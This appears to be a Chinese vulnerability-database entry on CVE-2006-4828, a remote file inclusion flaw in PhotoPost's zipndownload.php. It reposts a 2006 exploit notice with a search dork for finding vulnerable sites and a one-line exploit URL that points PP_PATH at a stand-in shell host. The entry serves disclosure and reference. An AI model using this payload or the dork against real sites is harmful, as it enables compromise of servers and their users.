PhotoPost 'zipndownload.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111050 漏洞类型 输入验证
发布时间 2006-09-15 更新时间 2006-09-27
CVE编号 CVE-2006-4828 CNNVD-ID CNNVD-200609-272
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2369
https://cxsecurity.com/issue/WLB-2006090109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-272
|漏洞详情
PhotoPost的zipndownload.php中存在PHP远程文件包含漏洞,远程攻击者可以通过PP_PATH参数中的URL执行任意PHP代码。
|漏洞EXP
#====================================================================
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.com/
#
#=================================================================
#
#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0
#Fix : update To 4.7 or 4.8
#Script :)
#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg
#
#=================================================================
#Bug in : zipndownload.php
#        require "$PP_PATH/languages/$pplang/showgallery.php";
#        require "$PP_PATH/login-inc.php";
#
#in <<<<  zipndownload.php & .... :)
#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?
#
#=================================I LOVE SAUDI
ARABIA=============================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , King18 , LeCoPrA And All My Frind
#www.S3hr.com , http://www.elite-team.cc/vb , www.3asfh.net  ,www.xp10.com ,www.lezr.com
==================================I LOVE SAUDI ARABIA=============================================#

# milw0rm.com [2006-09-15]
|参考资料

来源:BID
名称:20028
链接:http://www.securityfocus.com/bid/20028
来源:XF
名称:photopost-zipdownload-file-include(28948)
链接:http://xforce.iss.net/xforce/xfdb/28948
来源:BUGTRAQ
名称:20060914PhotoPost=>4.6(PP_PATH)RemoteFileInclusionExploit
链接:http://www.securityfocus.com/archive/1/archive/1/446031/100/0/threaded
来源:SREASON
名称:1581
链接:http://securityreason.com/securityalert/1581